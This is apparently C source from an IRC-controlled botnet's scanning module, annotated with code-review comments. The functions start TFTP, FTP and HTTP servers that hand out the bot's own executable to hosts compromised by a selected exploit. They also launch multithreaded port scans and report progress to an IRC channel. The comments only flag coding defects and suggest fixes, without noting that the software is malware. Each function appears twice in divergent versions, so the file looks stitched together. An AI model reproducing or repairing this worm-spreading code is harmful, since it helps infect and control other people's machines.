// Starts the helper server a scan depends on before the port-scan workers run:
// the TFTP server (and, unless NO_FTPD is defined, the FTP server) when
// exploit[scan.exploit].tftp is set, the HTTP server when
// exploit[scan.exploit].http is set.  Each server runs on its own thread and
// receives a pointer to a function-local `static` struct, so at most one
// instance of each can be configured from here.  The call spin-waits until the
// server thread flags that it has read its settings.  Nothing is started when
// scan.exploit is -1 or a thread of that type already exists
// (findthreadid() != 0; presumably a count of threads of that kind).
//
// Review notes (defects visible in this block):
//  - Preprocessor/brace mismatch: `if (findthreadid(TFTP_THREAD) == 0) {` is
//    inside #ifndef NO_TFTPD but its closing brace (after the FTP section) is
//    not, so the function does not compile with NO_TFTPD defined.
//  - sprintf() into sendbuf is unbounded; the module path fields alone are
//    sizeof(tftp.filename) / sizeof(httpd.dir) bytes, so the formatted line
//    can exceed IRCLINE.  Use snprintf(sendbuf, sizeof sendbuf, ...).
//  - `sprintf(httpd.chan, scan.chan)` uses scan.chan as the format string and
//    has no bound (CERT FIO30-C); the fix is
//    `snprintf(httpd.chan, sizeof httpd.chan, "%s", scan.chan)`.
//  - ftp.port is never assigned here (the assignment is commented out), so the
//    "Server started on Port" line reports a stale or zero value.
//  - The `while (... == FALSE) Sleep(50);` loops poll a field written by
//    another thread with no synchronisation or atomic qualifier.
//  - addthread()'s return value indexes threads[] unchecked; GetLastError()
//    returns a DWORD but is printed with %d.
void CheckServers(ADVSCAN scan)
{
	char sendbuf[IRCLINE];	// log line; also the description handed to addthread()

	DWORD id;	// CreateThread's thread-id out-parameter; never read afterwards

	if(scan.exploit != -1) {
		if (exploit[scan.exploit].tftp) {
			#ifndef NO_TFTPD
			if (findthreadid(TFTP_THREAD) == 0) {
				// static: its address is passed to the server thread and must outlive this call
				static TFTP tftp;
				tftp.port = tftpport;	// file-scope setting, not part of `scan`
				tftp.threads = 0;
				GetModuleFileName(0,tftp.filename,sizeof(tftp.filename));	// path of this executable
				// `filename` is a file-scope name; -1 leaves the final NUL of the zero-initialised static intact
				strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1);
				tftp.sock=scan.sock;
				tftp.notice = scan.notice;
				// With no message channel, report to the scan channel silently.
				if (scan.msgchan[0] == '\0') {
					strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1);
					tftp.silent = TRUE;
				} else {
					strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1);
					tftp.silent = FALSE;
				}
				
				// Unbounded: tftp.filename can be sizeof(tftp.filename) bytes on its own.
				sprintf(sendbuf, "[TFTP]: Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname);
				tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL);
				// Assignment, not comparison, is intended: the handle is stored and NULL means failure.
				if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) {
					// Unsynchronised spin-wait for the server thread to set gotinfo.
					while (tftp.gotinfo == FALSE) 
						Sleep(50);
				} else
					sprintf(sendbuf, "[TFTP]: Failed to start server, error: <%d>.", GetLastError());

				addlog(sendbuf);
				#endif
				#ifndef NO_FTPD
				// FTP server: same setup as the TFTP server above, on a second static struct.
				static FTP ftp;
				//ftp.port = FTP_PORT;
				ftp.threads = 0;
				GetModuleFileName(0,ftp.filename,sizeof(ftp.filename));
				strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1);
				ftp.sock=scan.sock;
				ftp.notice = scan.notice;
				if (scan.msgchan[0] == '\0') {
					strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1);
					ftp.silent = TRUE;
				} else {
					strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1);
					ftp.silent = FALSE;
				}
				
				// ftp.port was never set in this function (see the commented-out line above).
				sprintf(sendbuf, "[FTP]: Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname);
				ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL);
				if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) {
					while (ftp.gotinfo == FALSE) 
						Sleep(50);
				} else
					sprintf(sendbuf, "[FTP]: Failed to start server, error: <%d>.", GetLastError());

				addlog(sendbuf);
				// end FTP server
				#endif
			}
		} else if (exploit[scan.exploit].http) {
			if (findthreadid(HTTP_THREAD) == 0) {
				static HTTPD httpd;
				
				char *c;
				// Serve from the directory containing this executable: take the module path and cut at the last backslash.
				GetModuleFileName(0,httpd.dir,sizeof(httpd.dir));
				if ((c=strrchr(httpd.dir,'\\')) != NULL)
					*c='\0';
				httpd.port = httpport;
				httpd.enabled = FALSE;
				// scan.chan is used as the format string here and the copy is unbounded
				// (CERT FIO30-C); should be snprintf(httpd.chan, sizeof httpd.chan, "%s", scan.chan).
				sprintf(httpd.chan, scan.chan);
				httpd.sock = scan.sock;
				httpd.notice = scan.notice;
				httpd.silent = scan.silent;

				sprintf(sendbuf,"[HTTPD]: Server listening on IP: %s:%d, Directory: %s\\.", GetIP(scan.sock), httpd.port, httpd.dir);

				httpd.threadnum = addthread(sendbuf,HTTP_THREAD,NULL);
				if (threads[httpd.threadnum].tHandle = CreateThread(NULL, 0, &HTTP_Server_Thread, (LPVOID)&httpd, 0, &id)) {
					while(httpd.info == FALSE)
						Sleep(50);
				} else
					sprintf(sendbuf, "[HTTPD]: Failed to start server, error: <%d>.", GetLastError());

				addlog(sendbuf);
			}
		}
	}

	return;
}
// Starts the TFTP server (and, unless NO_FTPD is defined, the FTP server) that
// a scan depends on when exploit[scan.exploit].tftp is set.  Each server runs
// on its own thread and receives a pointer to a function-local `static`
// struct, so at most one instance of each can be configured from here.  The
// call spin-waits until the server thread flags that it has read its settings.
// Nothing is started when scan.exploit is -1, the exploit entry is not marked
// tftp, or a TFTP thread already exists (findthreadid() != 0; presumably a
// count of threads of that kind).
//
// Review notes (defects visible in this block):
//  - Preprocessor/brace mismatch: `if (findthreadid(TFTP_THREAD) == 0) {` is
//    inside #ifndef NO_TFTPD but its closing brace (after the FTP section) is
//    not, so the function does not compile with NO_TFTPD defined.
//  - sprintf() into sendbuf is unbounded; tftp.filename / ftp.filename alone
//    can be their full array size, so the line can exceed IRCLINE.  Use
//    snprintf(sendbuf, sizeof sendbuf, ...).
//  - ftp.port is never assigned here (the assignment is commented out), so the
//    "Server started on Port" line reports a stale or zero value.
//  - The `while (... == FALSE) Sleep(50);` loops poll a field written by
//    another thread with no synchronisation or atomic qualifier.
//  - addthread()'s return value indexes threads[] unchecked; GetLastError()
//    returns a DWORD but is printed with %d.
void CheckServers(ADVSCAN scan)
{
	char sendbuf[IRCLINE];	// log line; also the description handed to addthread()

	DWORD id;	// CreateThread's thread-id out-parameter; never read afterwards

	if(scan.exploit != -1) {
		if (exploit[scan.exploit].tftp) {
			#ifndef NO_TFTPD
			if (findthreadid(TFTP_THREAD) == 0) {
				// static: its address is passed to the server thread and must outlive this call
				static TFTP tftp;
				tftp.port = tftpport;	// file-scope setting, not part of `scan`
				tftp.threads = 0;
				GetModuleFileName(0,tftp.filename,sizeof(tftp.filename));	// path of this executable
				// `filename` is a file-scope name; -1 leaves the final NUL of the zero-initialised static intact
				strncpy(tftp.requestname, filename, sizeof(tftp.requestname)-1);
				tftp.sock=scan.sock;
				tftp.notice = scan.notice;
				// With no message channel, report to the scan channel silently.
				if (scan.msgchan[0] == '\0') {
					strncpy(tftp.chan, scan.chan, sizeof(tftp.chan)-1);
					tftp.silent = TRUE;
				} else {
					strncpy(tftp.chan, scan.msgchan, sizeof(tftp.chan)-1);
					tftp.silent = FALSE;
				}

				// Unbounded: tftp.filename can be sizeof(tftp.filename) bytes on its own.
				sprintf(sendbuf, "tftp -- Server started on Port: %d, File: %s, Request: %s.", tftp.port, tftp.filename, tftp.requestname);
				tftp.threadnum = addthread(sendbuf,TFTP_THREAD,NULL);
				// Assignment, not comparison, is intended: the handle is stored and NULL means failure.
				if (threads[tftp.threadnum].tHandle = CreateThread(NULL, 0, &tftpserver, (LPVOID)&tftp, 0, &id)) {
					// Unsynchronised spin-wait for the server thread to set gotinfo.
					while (tftp.gotinfo == FALSE)
						Sleep(50);
				} else
					sprintf(sendbuf, "tftp -- Failed to start server, error: <%d>.", GetLastError());

				addlog(sendbuf);
				#endif
				#ifndef NO_FTPD
				// FTP server: same setup as the TFTP server above, on a second static struct.
				static FTP ftp;
				//ftp.port = FTP_PORT;
				ftp.threads = 0;
				GetModuleFileName(0,ftp.filename,sizeof(ftp.filename));
				strncpy(ftp.requestname, filename, sizeof(ftp.requestname)-1);
				ftp.sock=scan.sock;
				ftp.notice = scan.notice;
				if (scan.msgchan[0] == '\0') {
					strncpy(ftp.chan, scan.chan, sizeof(ftp.chan)-1);
					ftp.silent = TRUE;
				} else {
					strncpy(ftp.chan, scan.msgchan, sizeof(ftp.chan)-1);
					ftp.silent = FALSE;
				}

				// ftp.port was never set in this function (see the commented-out line above).
				sprintf(sendbuf, "ftp -- Server started on Port: %d, File: %s, Request: %s.", ftp.port, ftp.filename, ftp.requestname);
				ftp.threadnum = addthread(sendbuf,FTP_THREAD,NULL);
				if (threads[ftp.threadnum].tHandle = CreateThread(NULL, 0, &ftpd, (LPVOID)&ftp, 0, &id)) {
					while (ftp.gotinfo == FALSE)
						Sleep(50);
				} else
					sprintf(sendbuf, "ftp -- Failed to start server, error: <%d>.", GetLastError());

				addlog(sendbuf);
				// end FTP server
				#endif
			}

		}
	}

	return;
}
// Thread entry point for one scan job.  `param` points at the caller's ADVSCAN;
// it is copied by value, the caller is released by setting scanp->gotinfo, and
// the target address is recorded in advinfo[].  CheckServers() then starts any
// helper server the selected exploit needs, after which scan.threads worker
// threads (AdvPortScanner) are spawned, each handed a pointer to this thread's
// local copy of `scan`.  The thread then waits either scan.minutes minutes or
// until advinfo[].info is cleared, reports completion to IRC and the log, and
// exits via ExitThread().
//
// Review notes (defects visible in this block):
//  - DeleteCriticalSection() is called "just in case" on a critical section
//    that may never have been initialised, which the Win32 contract does not
//    allow; the findthreadid()==1 test-then-init is itself unsynchronised
//    across concurrently starting scan threads.
//  - `&scan` is a stack object of this thread and the same pointer is handed
//    to every worker while the loop keeps rewriting scan.cthreadid and
//    scan.cthreadnum.  The cgotinfo spin-wait only orders the hand-off if the
//    worker resets scan.cgotinfo to FALSE (not visible here); otherwise every
//    wait after the first falls through at once -- TODO confirm in AdvPortScanner.
//  - sprintf() into buffer is unbounded; scan.ip and sc_title originate outside
//    this function.  Use snprintf(buffer, sizeof buffer, ...).  GetLastError()
//    is a DWORD printed with %d.
//  - 60000*scan.minutes can overflow for large values, depending on the
//    field's type -- TODO confirm type of scan.minutes.
//  - addthread()'s return value indexes threads[] unchecked.
DWORD WINAPI AdvScanner(LPVOID param)
{
	char buffer[LOGLINE]; 

	ADVSCAN scan = *((ADVSCAN *)param);	// private copy; workers below point into it
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->gotinfo = TRUE;	// tells the creator its struct may be reused (presumably spin-waited on, as CheckServers does)
	advinfo[scan.threadnum].ip = finet_addr(scan.ip);

	CheckServers(scan);

	// Only the first scan thread sets up the shared critical section.
	if (findthreadid(SCAN_THREAD) == 1) {
		DeleteCriticalSection(&CriticalSection); // just in case

		if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
			sprintf(buffer,"Failed to initialize critical section.");
			if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
			addlog(buffer);

			return 0;
		}
	}

	advinfo[scan.threadnum].info = TRUE;	// "scan in progress" flag polled below
	for (unsigned int i=1;i<=(scan.threads);i++) {
		scan.cthreadid = i;
		sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); 
		scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
		threads[scan.cthreadnum].parent = scan.threadnum;
		// Assignment, not comparison, is intended: the handle is stored and NULL means failure.
		if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) {
			// Unsynchronised spin-wait for the worker to acknowledge its copy of `scan`.
			while (scan.cgotinfo == FALSE)
				Sleep(30);
		} else {
			sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError());
			addlog(buffer);
		}

		Sleep(30);
	}

	// Fixed duration if requested, else run until something clears the info flag.
	if (scan.minutes != 0)
		Sleep(60000*scan.minutes);
	else 
		while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);

	IN_ADDR in;
	in.s_addr = advinfo[scan.threadnum].ip;
	sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes);
	if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
	addlog(buffer);

	advinfo[scan.threadnum].info = FALSE;
	Sleep(3000);	// grace period before tearing down; workers still hold &scan -- TODO confirm they have exited by now

	if (findthreadid(SCAN_THREAD) == 1) 
		DeleteCriticalSection(&CriticalSection);

	clearthread(scan.threadnum);

	ExitThread(0);	// never returns; no code after this runs
}
// Thread entry point for one scan job.  `param` points at the caller's ADVSCAN;
// it is copied by value, the caller is released by setting scanp->gotinfo, and
// the target address is recorded in advinfo[].  CheckServers() then starts any
// helper server the selected exploit needs, after which scan.threads worker
// threads (AdvPortScanner) are spawned, each handed a pointer to this thread's
// local copy of `scan`.  The thread then waits either scan.minutes minutes or
// until advinfo[].info is cleared, reports completion to IRC and the log, and
// exits via ExitThread().
//
// Review notes (defects visible in this block):
//  - The worker loop has no hand-off at all: CreateThread's result is stored
//    but never checked, and a fixed Sleep(50) stands in for synchronisation
//    while scan.cthreadid/cthreadnum are rewritten on the next iteration.  A
//    worker scheduled late reads another worker's values, and &scan is this
//    thread's stack, which ExitThread() below frees.
//  - DeleteCriticalSection() is called "just in case" on a critical section
//    that may never have been initialised, which the Win32 contract does not
//    allow; the findthreadid()==1 test-then-init is itself unsynchronised
//    across concurrently starting scan threads.
//  - sprintf() into buffer is unbounded; scan.ip originates outside this
//    function.  Use snprintf(buffer, sizeof buffer, ...).
//  - 60000*scan.minutes can overflow for large values, depending on the
//    field's type -- TODO confirm type of scan.minutes.
//  - szSelfExe is declared but only used by the commented-out block; drop it
//    or restore the code.  addthread()'s return indexes threads[] unchecked.
DWORD WINAPI AdvScanner(LPVOID param)
{
	char buffer[LOGLINE], szSelfExe[MAX_PATH];	// szSelfExe is unused (see commented-out block)

	ADVSCAN scan = *((ADVSCAN *)param);	// private copy; workers below point into it
	ADVSCAN *scanp = (ADVSCAN *)param;
	scanp->gotinfo = TRUE;	// tells the creator its struct may be reused (presumably spin-waited on, as CheckServers does)
	advinfo[scan.threadnum].ip = finet_addr(scan.ip);
/*
	// FIX ME: Make this a standalone function
	if (!FileExists(szLocalPayloadFile)) {
		GetModuleFileName(0,szSelfExe,MAX_PATH);
		CopyFile(szSelfExe,szLocalPayloadFile,FALSE);
		// FIX ME: Make this copy to the same directory (could affect other stuff)
	}
*/
	CheckServers(scan);

	// Only the first scan thread sets up the shared critical section.
	if (findthreadid(SCAN_THREAD) == 1) {
		DeleteCriticalSection(&CriticalSection); // just in case

		if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) {
			// failed to initialize CriticalSection
			sprintf(buffer,"[scan]: Failed to initialize critical section.");
			if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
			addlog(buffer);

			return 0;
		}
	}

	advinfo[scan.threadnum].info = TRUE;	// "scan in progress" flag polled below
	for (unsigned int i=1;i<=(scan.threads);i++) {
		scan.cthreadid = i;
		sprintf(buffer,"[scan]: %s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); 
		scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL);
		threads[scan.cthreadnum].parent = scan.threadnum;
		threads[scan.cthreadnum].port = scan.port;
		// Return value unchecked; a NULL handle is stored silently.  Sleep(50) is not a hand-off:
		// the worker may read `scan` after the next iteration has changed cthreadid/cthreadnum.
		threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(void *)&scan,0,0);
		Sleep(50);
	}

	// Fixed duration if requested, else run until something clears the info flag.
	if (scan.minutes != 0)
		Sleep(60000*scan.minutes);
	else 
		while (advinfo[scan.threadnum].info == TRUE) Sleep(2000);

	IN_ADDR in;
	in.s_addr = advinfo[scan.threadnum].ip;
	sprintf(buffer,"[scan]: Finished at %s:%d after %d minute(s) of scanning.", finet_ntoa(in), scan.port, scan.minutes);
	if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice);
	addlog(buffer);

	advinfo[scan.threadnum].info = FALSE;
	Sleep(3000);	// grace period before tearing down; workers still hold &scan -- TODO confirm they have exited by now

	if (findthreadid(SCAN_THREAD) == 1) 
		DeleteCriticalSection(&CriticalSection);

	clearthread(scan.threadnum);

	ExitThread(0);	// never returns; this thread's stack (and `scan`) is gone after this
}